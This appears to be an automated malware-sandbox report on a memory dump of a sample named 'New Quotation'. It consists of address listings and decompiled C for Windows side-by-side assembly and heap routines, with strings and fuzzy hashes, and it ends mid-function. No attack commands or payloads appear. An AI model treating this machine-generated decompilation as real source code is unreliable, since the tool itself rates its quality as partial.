                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88000d
                                                                                                                                                                                          0x1d880013
                                                                                                                                                                                          0x1d880016
                                                                                                                                                                                          0x1d880035
                                                                                                                                                                                          0x1d88003a
                                                                                                                                                                                          0x1d880018
                                                                                                                                                                                          0x1d88002d
                                                                                                                                                                                          0x1d880032
                                                                                                                                                                                          0x1d880040
                                                                                                                                                                                          0x1d88004b
                                                                                                                                                                                          0x1d88004c
                                                                                                                                                                                          0x1d88004f
                                                                                                                                                                                          0x1d880058
                                                                                                                                                                                          0x1d88005d
                                                                                                                                                                                          0x1d87ff47
                                                                                                                                                                                          0x1d87ff47
                                                                                                                                                                                          0x1d87ff4d
                                                                                                                                                                                          0x1d87ff51
                                                                                                                                                                                          0x1d87ff57
                                                                                                                                                                                          0x1d87ff5e
                                                                                                                                                                                          0x1d87ff64
                                                                                                                                                                                          0x1d87ff65
                                                                                                                                                                                          0x1d87ff65
                                                                                                                                                                                          0x1d87ff51
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fff5
                                                                                                                                                                                          0x1d87ff04
                                                                                                                                                                                          0x1d87ff07
                                                                                                                                                                                          0x1d87ff26
                                                                                                                                                                                          0x1d87ff2b
                                                                                                                                                                                          0x1d87ff09
                                                                                                                                                                                          0x1d87ff1e
                                                                                                                                                                                          0x1d87ff23
                                                                                                                                                                                          0x1d87ff31
                                                                                                                                                                                          0x1d87ff3f
                                                                                                                                                                                          0x1d87ff44
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87ff44
                                                                                                                                                                                          0x1d87fe18
                                                                                                                                                                                          0x1d87fe20
                                                                                                                                                                                          0x1d87fe28
                                                                                                                                                                                          0x1d87fe2e
                                                                                                                                                                                          0x1d8802d1
                                                                                                                                                                                          0x1d8802d4
                                                                                                                                                                                          0x1d8802e0
                                                                                                                                                                                          0x1d8802e0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                          • API String ID: 3446177414-1700792311
                                                                                                                                                                                          • Opcode ID: 5ef034228975d8ea0595724200e37fd13ebc3564f2000d6213a23cd7c42cdbfd
                                                                                                                                                                                          • Instruction ID: 18284fde303990b6af297de53343ca3c1c0642c081b79b51db01eda24d3386f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ef034228975d8ea0595724200e37fd13ebc3564f2000d6213a23cd7c42cdbfd
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBD1CF3590469ADFCB02CFA8C844ABDBBF6FF49720F058059F5459B263C735A942DB12
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D802919 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E1D802919(signed int __ecx, signed int __edx, signed int _a4, intOrPtr _a12) {
				signed int _v12;
				char _v552;
				char _v1072;
				char _v1073;
				signed int _v1080;
				signed int _v1084;
				signed short _v1088;
				signed int _v1092;
				signed short _v1094;
				char _v1096;
				char _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				char _v1112;
				char _v1116;
				signed short _v1120;
				char _v1124;
				char* _v1128;
				char _v1132;
				char _v1135;
				char _v1136;
				signed int _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				signed int _v1156;
				char* _v1160;
				char _v1164;
				signed int _v1168;
				signed int _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				char _v1184;
				signed int _v1188;
				signed int _v1192;
				intOrPtr _v1196;
				char* _v1200;
				intOrPtr _v1204;
				char _v1208;
				char _v1216;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t166;
				void* _t184;
				signed short _t188;
				char _t199;
				intOrPtr _t200;
				signed int _t205;
				signed int _t207;
				intOrPtr _t218;
				short _t219;
				char _t236;
				char _t242;
				signed int _t253;
				intOrPtr _t258;
				void* _t260;
				signed int _t272;
				void* _t276;
				unsigned int _t277;
				signed short _t279;
				signed int _t280;
				void* _t281;
				void* _t305;

				_t271 = __edx;
				_v12 =  *0x1d8cb370 ^ _t280;
				_t253 = _a4;
				_v1104 = _a12;
				_t272 = __ecx;
				_v1160 =  &_v1072;
				_v1168 = __ecx;
				_t166 = 0;
				_v1073 = 0;
				_v1084 = 0;
				_t274 = 0;
				_v1156 = 0;
				_v1164 = 0x2080000;
				_v1096 = 0;
				_v1092 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1100 = 0;
				if(__ecx == 0) {
					L67:
					_push(_t166);
					_push(_t253);
					_push(_t271);
					_push(_t272);
					E1D85EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t274 = 0xc000000d;
					L21:
					if(_v1073 == 0) {
						L23:
						if(_v1092 != 0) {
							E1D7CBA80(_v1092);
						}
						L24:
						if(_v1084 != 0) {
							_push(_v1084);
							E1D812A80();
						}
						_t170 = _v1156;
						if(_v1156 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t170);
						}
						L26:
						return E1D814B50(_t274, _t253, _v12 ^ _t280, _t271, _t272, _t274);
					}
					L22:
					_v1144 = _v1100;
					E1D802C10("true",  &_v1144, _v1104);
					goto L23;
				}
				if(__edx == 0 || _t253 < 1 || _t253 >  *((intOrPtr*)(__ecx + 4))) {
					_t166 =  *((intOrPtr*)(_t272 + 4));
					goto L67;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t253 * 4)) != 0) {
						goto L26;
					}
					asm("lfence");
					_t258 =  *((intOrPtr*)(__edx + 0x18));
					_t260 =  *((intOrPtr*)(_t258 + __edx + 0x10)) + __edx;
					_t276 =  *((intOrPtr*)(_t253 * 0x18 +  *((intOrPtr*)(_t258 + __edx + 0xc)) + __edx + 0x10)) + __edx;
					_t181 =  *((intOrPtr*)(_t276 + 0x50));
					if( *((intOrPtr*)(_t276 + 0x50)) > 0xfffe) {
						_push(__edx);
						E1D85EF10(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t181);
						_t274 = 0xc0000106;
						goto L23;
					}
					if(( *(_t276 + 4) & 0x00000010) != 0) {
						_v1080 =  &_v1164;
						_t272 =  *((intOrPtr*)(_t276 + 0x18)) + _t260;
						if(_t272 != 0) {
							_t184 = E1D81A910(_t272, 0x5c);
							if(_t184 != 0) {
								_t188 = 0x00000004 + (_t184 - _t272 >> 0x00000001) * 0x00000002 & 0x0000ffff;
								_v1088 = _t188;
								_t277 = _t188 & 0x0000ffff;
								if(_t188 <= 0x208) {
									_t264 = _v1080;
									L39:
									E1D8188C0( *((intOrPtr*)(_t264 + 4)), _t272, _t277 - 2);
									_t281 = _t281 + 0xc;
									 *((short*)( *((intOrPtr*)(_v1080 + 4)) + (_t277 >> 1) * 2 - 2)) = 0;
									 *_v1080 = _v1088 + 0xfffffffe;
									L18:
									if(_v1084 == 0) {
										if(E1D7F1C10( *((intOrPtr*)(_v1080 + 4)),  &_v1112, 0,  &_v1184) != 0) {
											_v1156 = _v1108;
											_t199 = _v1184;
											if(_t199 == 0) {
												_t200 = 0;
											} else {
												_v1112 = _t199;
												_v1108 = _v1180;
												_t200 = _v1176;
											}
											_v1192 = _v1192 & 0x00000000;
											_v1188 = _v1188 & 0x00000000;
											_v1204 = _t200;
											_push(0x21);
											_v1200 =  &_v1112;
											_push(3);
											_push( &_v1216);
											_v1208 = 0x18;
											_push( &_v1208);
											_push(0x100020);
											_v1196 = 0x40;
											_push( &_v1084);
											_t205 = E1D812CE0();
											_t272 = _v1172;
											_t274 = _t205;
											if(_t272 != 0) {
												asm("lock xadd [edi], eax");
												if((_t205 | 0xffffffff) == 0) {
													_push( *((intOrPtr*)(_t272 + 4)));
													E1D812A80();
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t272);
												}
											}
											if(_t274 >= 0) {
												goto L19;
											} else {
												_push(_t274);
												E1D85EF10(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n",  *((intOrPtr*)(_v1080 + 4)));
												goto L21;
											}
										}
										E1D85EF10(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n",  *((intOrPtr*)(_v1080 + 4)));
										_t274 = 0xc000003a;
										goto L21;
									}
									L19:
									_t271 = _t253;
									_t207 = E1D802DBC(_v1168, _t253, _v1080,  &_v1084);
									_t274 = _t207;
									if(_t207 < 0) {
										E1D85EF10(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t274);
									} else {
										_t274 = 0;
									}
									goto L21;
								}
								_v1094 = _t188;
								_t218 = E1D7E5D60(_t277);
								_v1092 = _t218;
								if(_t218 != 0) {
									_t264 =  &_v1096;
									_v1080 =  &_v1096;
									goto L39;
								}
								_t274 = 0xc0000017;
								goto L24;
							}
							_t274 = 0xc00000e5;
							goto L23;
						}
						_t274 = 0xc00000e5;
						goto L26;
					}
					_v1080 = _v1080 & 0x00000000;
					_t219 =  *((intOrPtr*)(_t276 + 0x50));
					_v1152 = _t219;
					_v1150 = _t219;
					_v1144 = __edx;
					_v1148 =  *((intOrPtr*)(_t276 + 0x54)) + _t260;
					_v1140 = _t253;
					_v1128 =  &_v552;
					_v1136 = 0;
					_v1132 = 0x2160000;
					_v1124 = 0;
					_v1116 = 0;
					_v1120 = 0;
					E1D802C10(1,  &_v1144, _v1104);
					if(_v1116 != 0) {
						_t274 = 0xc0000120;
						goto L23;
					}
					if(_v1124 != 0) {
						_t271 =  &_v1132;
						_t274 = E1D802EB8( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
						if(_t274 >= 0) {
							_t271 = _t253;
							_t274 = E1D802DBC(_t272, _t253,  &_v1132,  &_v1084);
							if(_t274 < 0) {
								_push(_t274);
								_push(_t253);
								_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
								L44:
								_push(0);
								_push(0x33);
								E1D85EF10();
								goto L23;
							}
							_t274 = 0;
							goto L23;
						}
						_push(_t274);
						_push( &_v1132);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L44;
					}
					_t279 = _v1120;
					_t272 = 0;
					_t236 = _v1136;
					_v1100 = _t236;
					_v1088 = _t279;
					_v1073 = 1;
					if(_t279 == 0) {
						L16:
						_t305 = _t272 - _t279;
						L17:
						if(_t305 == 0) {
							L54:
							_push(_t272);
							E1D85EF10(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t274 = 0xc0150004;
							goto L22;
						}
						goto L18;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1144 = _t236;
						_v1128 =  &_v552;
						_v1140 = _t272;
						_v1132 = 0x2160000;
						_v1136 = 0;
						E1D802C10(2,  &_v1144, _v1104);
						if(_v1136 != 0) {
							break;
						}
						_t242 = _v1132;
						if(_v1135 != 0) {
							if(_t242 == 0) {
								goto L54;
							}
							_t119 = _t272 + 1; // 0x1
							_t279 = _t119;
							_v1088 = _t279;
						}
						if(_t242 == 0) {
							L27:
							_t272 = _t272 + 1;
							if(_t272 >= _t279) {
								goto L17;
							} else {
								_t236 = _v1100;
								continue;
							}
						}
						if(_v1084 != 0) {
							_push(_v1084);
							E1D812A80();
							_v1084 = _v1084 & 0x00000000;
						}
						_t271 =  &_v1132;
						_t274 = E1D802EB8( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
						if(_t274 < 0) {
							if(_t274 != 0xc0150004) {
								_push(_t274);
								_push( &_v1152);
								E1D85EF10(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1132);
								goto L22;
							}
							_t279 = _v1088;
							goto L27;
						} else {
							_t279 = _v1088;
							goto L16;
						}
					}
					_t274 = 0xc0000120;
					goto L22;
				}
			}




































































                                                                                                                                                                                          0x1d802919
                                                                                                                                                                                          0x1d80292b
                                                                                                                                                                                          0x1d802932
                                                                                                                                                                                          0x1d802936
                                                                                                                                                                                          0x1d802943
                                                                                                                                                                                          0x1d802945
                                                                                                                                                                                          0x1d80294d
                                                                                                                                                                                          0x1d802953
                                                                                                                                                                                          0x1d802955
                                                                                                                                                                                          0x1d80295b
                                                                                                                                                                                          0x1d802961
                                                                                                                                                                                          0x1d802963
                                                                                                                                                                                          0x1d802969
                                                                                                                                                                                          0x1d802973
                                                                                                                                                                                          0x1d802979
                                                                                                                                                                                          0x1d80297f
                                                                                                                                                                                          0x1d802985
                                                                                                                                                                                          0x1d80298b
                                                                                                                                                                                          0x1d802993
                                                                                                                                                                                          0x1d842425
                                                                                                                                                                                          0x1d842425
                                                                                                                                                                                          0x1d842426
                                                                                                                                                                                          0x1d842427
                                                                                                                                                                                          0x1d842428
                                                                                                                                                                                          0x1d842436
                                                                                                                                                                                          0x1d84243e
                                                                                                                                                                                          0x1d802b96
                                                                                                                                                                                          0x1d802b9d
                                                                                                                                                                                          0x1d802bbf
                                                                                                                                                                                          0x1d802bc6
                                                                                                                                                                                          0x1d84244e
                                                                                                                                                                                          0x1d84244e
                                                                                                                                                                                          0x1d802bcc
                                                                                                                                                                                          0x1d802bd3
                                                                                                                                                                                          0x1d842458
                                                                                                                                                                                          0x1d84245e
                                                                                                                                                                                          0x1d84245e
                                                                                                                                                                                          0x1d802bd9
                                                                                                                                                                                          0x1d802be1
                                                                                                                                                                                          0x1d842474
                                                                                                                                                                                          0x1d842474
                                                                                                                                                                                          0x1d802be7
                                                                                                                                                                                          0x1d802bf7
                                                                                                                                                                                          0x1d802bf7
                                                                                                                                                                                          0x1d802b9f
                                                                                                                                                                                          0x1d802bab
                                                                                                                                                                                          0x1d802bba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802bba
                                                                                                                                                                                          0x1d80299b
                                                                                                                                                                                          0x1d842422
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8029b3
                                                                                                                                                                                          0x1d8029b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8029bf
                                                                                                                                                                                          0x1d8029c2
                                                                                                                                                                                          0x1d8029d0
                                                                                                                                                                                          0x1d8029d6
                                                                                                                                                                                          0x1d8029d8
                                                                                                                                                                                          0x1d8029e0
                                                                                                                                                                                          0x1d8420ec
                                                                                                                                                                                          0x1d8420f7
                                                                                                                                                                                          0x1d8420ff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8420ff
                                                                                                                                                                                          0x1d8029ea
                                                                                                                                                                                          0x1d84210f
                                                                                                                                                                                          0x1d842118
                                                                                                                                                                                          0x1d84211a
                                                                                                                                                                                          0x1d842129
                                                                                                                                                                                          0x1d842132
                                                                                                                                                                                          0x1d84214e
                                                                                                                                                                                          0x1d842151
                                                                                                                                                                                          0x1d842157
                                                                                                                                                                                          0x1d84215d
                                                                                                                                                                                          0x1d84218e
                                                                                                                                                                                          0x1d842194
                                                                                                                                                                                          0x1d84219c
                                                                                                                                                                                          0x1d8421ab
                                                                                                                                                                                          0x1d8421b1
                                                                                                                                                                                          0x1d8421c5
                                                                                                                                                                                          0x1d802b63
                                                                                                                                                                                          0x1d802b6a
                                                                                                                                                                                          0x1d842305
                                                                                                                                                                                          0x1d842331
                                                                                                                                                                                          0x1d842337
                                                                                                                                                                                          0x1d842340
                                                                                                                                                                                          0x1d84235c
                                                                                                                                                                                          0x1d842342
                                                                                                                                                                                          0x1d842342
                                                                                                                                                                                          0x1d84234e
                                                                                                                                                                                          0x1d842354
                                                                                                                                                                                          0x1d842354
                                                                                                                                                                                          0x1d84235e
                                                                                                                                                                                          0x1d842365
                                                                                                                                                                                          0x1d84236c
                                                                                                                                                                                          0x1d842378
                                                                                                                                                                                          0x1d84237a
                                                                                                                                                                                          0x1d842386
                                                                                                                                                                                          0x1d842388
                                                                                                                                                                                          0x1d84238f
                                                                                                                                                                                          0x1d842399
                                                                                                                                                                                          0x1d84239a
                                                                                                                                                                                          0x1d8423a5
                                                                                                                                                                                          0x1d8423af
                                                                                                                                                                                          0x1d8423b0
                                                                                                                                                                                          0x1d8423b5
                                                                                                                                                                                          0x1d8423bb
                                                                                                                                                                                          0x1d8423bf
                                                                                                                                                                                          0x1d8423c4
                                                                                                                                                                                          0x1d8423c8
                                                                                                                                                                                          0x1d8423ca
                                                                                                                                                                                          0x1d8423cd
                                                                                                                                                                                          0x1d8423de
                                                                                                                                                                                          0x1d8423de
                                                                                                                                                                                          0x1d8423c8
                                                                                                                                                                                          0x1d8423e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8423eb
                                                                                                                                                                                          0x1d8423f1
                                                                                                                                                                                          0x1d8423fe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842403
                                                                                                                                                                                          0x1d8423e5
                                                                                                                                                                                          0x1d842319
                                                                                                                                                                                          0x1d842321
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842321
                                                                                                                                                                                          0x1d802b70
                                                                                                                                                                                          0x1d802b83
                                                                                                                                                                                          0x1d802b85
                                                                                                                                                                                          0x1d802b8a
                                                                                                                                                                                          0x1d802b8e
                                                                                                                                                                                          0x1d842415
                                                                                                                                                                                          0x1d802b94
                                                                                                                                                                                          0x1d802b94
                                                                                                                                                                                          0x1d802b94
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802b8e
                                                                                                                                                                                          0x1d842160
                                                                                                                                                                                          0x1d842167
                                                                                                                                                                                          0x1d84216c
                                                                                                                                                                                          0x1d842174
                                                                                                                                                                                          0x1d842180
                                                                                                                                                                                          0x1d842186
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842186
                                                                                                                                                                                          0x1d842176
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842176
                                                                                                                                                                                          0x1d842134
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842134
                                                                                                                                                                                          0x1d84211c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84211c
                                                                                                                                                                                          0x1d8029f0
                                                                                                                                                                                          0x1d8029f7
                                                                                                                                                                                          0x1d802a01
                                                                                                                                                                                          0x1d802a08
                                                                                                                                                                                          0x1d802a14
                                                                                                                                                                                          0x1d802a1a
                                                                                                                                                                                          0x1d802a28
                                                                                                                                                                                          0x1d802a2e
                                                                                                                                                                                          0x1d802a3d
                                                                                                                                                                                          0x1d802a43
                                                                                                                                                                                          0x1d802a4d
                                                                                                                                                                                          0x1d802a53
                                                                                                                                                                                          0x1d802a59
                                                                                                                                                                                          0x1d802a5f
                                                                                                                                                                                          0x1d802a6b
                                                                                                                                                                                          0x1d8421cd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8421cd
                                                                                                                                                                                          0x1d802a78
                                                                                                                                                                                          0x1d8421fa
                                                                                                                                                                                          0x1d842205
                                                                                                                                                                                          0x1d842209
                                                                                                                                                                                          0x1d842238
                                                                                                                                                                                          0x1d842249
                                                                                                                                                                                          0x1d84224d
                                                                                                                                                                                          0x1d84221a
                                                                                                                                                                                          0x1d84221b
                                                                                                                                                                                          0x1d84221c
                                                                                                                                                                                          0x1d842221
                                                                                                                                                                                          0x1d842221
                                                                                                                                                                                          0x1d842223
                                                                                                                                                                                          0x1d842225
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84222a
                                                                                                                                                                                          0x1d84224f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84224f
                                                                                                                                                                                          0x1d84220b
                                                                                                                                                                                          0x1d842212
                                                                                                                                                                                          0x1d842213
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842213
                                                                                                                                                                                          0x1d802a7e
                                                                                                                                                                                          0x1d802a84
                                                                                                                                                                                          0x1d802a86
                                                                                                                                                                                          0x1d802a8c
                                                                                                                                                                                          0x1d802a92
                                                                                                                                                                                          0x1d802a98
                                                                                                                                                                                          0x1d802aa1
                                                                                                                                                                                          0x1d802b5b
                                                                                                                                                                                          0x1d802b5b
                                                                                                                                                                                          0x1d802b5d
                                                                                                                                                                                          0x1d802b5d
                                                                                                                                                                                          0x1d8422c2
                                                                                                                                                                                          0x1d8422c2
                                                                                                                                                                                          0x1d8422d3
                                                                                                                                                                                          0x1d8422db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8422db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802aa7
                                                                                                                                                                                          0x1d802aa7
                                                                                                                                                                                          0x1d802aad
                                                                                                                                                                                          0x1d802ab9
                                                                                                                                                                                          0x1d802ac8
                                                                                                                                                                                          0x1d802ace
                                                                                                                                                                                          0x1d802ad8
                                                                                                                                                                                          0x1d802ae1
                                                                                                                                                                                          0x1d802aed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802afa
                                                                                                                                                                                          0x1d802b01
                                                                                                                                                                                          0x1d842259
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84225b
                                                                                                                                                                                          0x1d84225b
                                                                                                                                                                                          0x1d84225e
                                                                                                                                                                                          0x1d84225e
                                                                                                                                                                                          0x1d802b0a
                                                                                                                                                                                          0x1d802bfa
                                                                                                                                                                                          0x1d802bfa
                                                                                                                                                                                          0x1d802bfd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802c03
                                                                                                                                                                                          0x1d802c03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802c03
                                                                                                                                                                                          0x1d802bfd
                                                                                                                                                                                          0x1d802b17
                                                                                                                                                                                          0x1d842269
                                                                                                                                                                                          0x1d84226f
                                                                                                                                                                                          0x1d842274
                                                                                                                                                                                          0x1d842274
                                                                                                                                                                                          0x1d802b40
                                                                                                                                                                                          0x1d802b4b
                                                                                                                                                                                          0x1d802b4f
                                                                                                                                                                                          0x1d842286
                                                                                                                                                                                          0x1d842293
                                                                                                                                                                                          0x1d84229a
                                                                                                                                                                                          0x1d8422ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8422b0
                                                                                                                                                                                          0x1d842288
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802b55
                                                                                                                                                                                          0x1d802b55
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802b55
                                                                                                                                                                                          0x1d802b4f
                                                                                                                                                                                          0x1d8422b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8422b8

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 1D8422CA
                                                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1D842310
                                                                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 1D8420EE
                                                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1D8423F5
                                                                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 1D842429
                                                                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 1D84240C
                                                                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 1D842213
                                                                                                                                                                                          • @, xrefs: 1D8423A5
                                                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 1D84242E
                                                                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 1D8422A2
                                                                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 1D84221C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                                                                          • Opcode ID: 993fb9daa2bbf9029caa6e2841fa1f0a13c5d69e4d514c95b5f42d76ce5604c5
                                                                                                                                                                                          • Instruction ID: 37c9a4fa9861670be2eff7e5b408e8f66600fd66b9f476161c57e6097b16e053
                                                                                                                                                                                          • Opcode Fuzzy Hash: 993fb9daa2bbf9029caa6e2841fa1f0a13c5d69e4d514c95b5f42d76ce5604c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA023DB5D0422D9FDB21CF14CC80BDAB7B8AB45714F4181DAE64CA7251DB70AE84CF6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D880E6D Relevance: 11.8, Strings: 9, Instructions: 515COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E1D880E6D(intOrPtr* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t215;
				signed int _t230;
				signed char _t236;
				intOrPtr _t237;
				unsigned int _t250;
				signed int _t251;
				intOrPtr _t257;
				intOrPtr _t267;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t298;
				intOrPtr _t304;
				signed int* _t308;
				intOrPtr* _t309;
				intOrPtr* _t310;
				signed int _t317;
				signed int _t319;
				signed short _t322;
				signed short _t325;
				signed int _t327;
				signed int _t330;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				void* _t338;
				signed int _t344;
				intOrPtr* _t345;
				signed int _t352;
				signed int _t354;
				signed char _t356;
				signed int* _t357;
				signed int _t372;
				signed int _t374;
				signed int _t376;
				signed int _t379;
				signed char _t384;
				intOrPtr* _t387;
				signed int _t389;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t394;
				intOrPtr _t399;
				intOrPtr* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t416;

				_t345 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t194 = 0;
				_v8 = _v8 & 0;
				_t344 = __edx;
				_v12 = 0;
				_t401 = __ecx;
				_t402 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t403 = _v16;
					if( *((intOrPtr*)(_t344 + 0x2c)) == _t403) {
						__eflags =  *((intOrPtr*)(_t344 + 0x30)) - _t194;
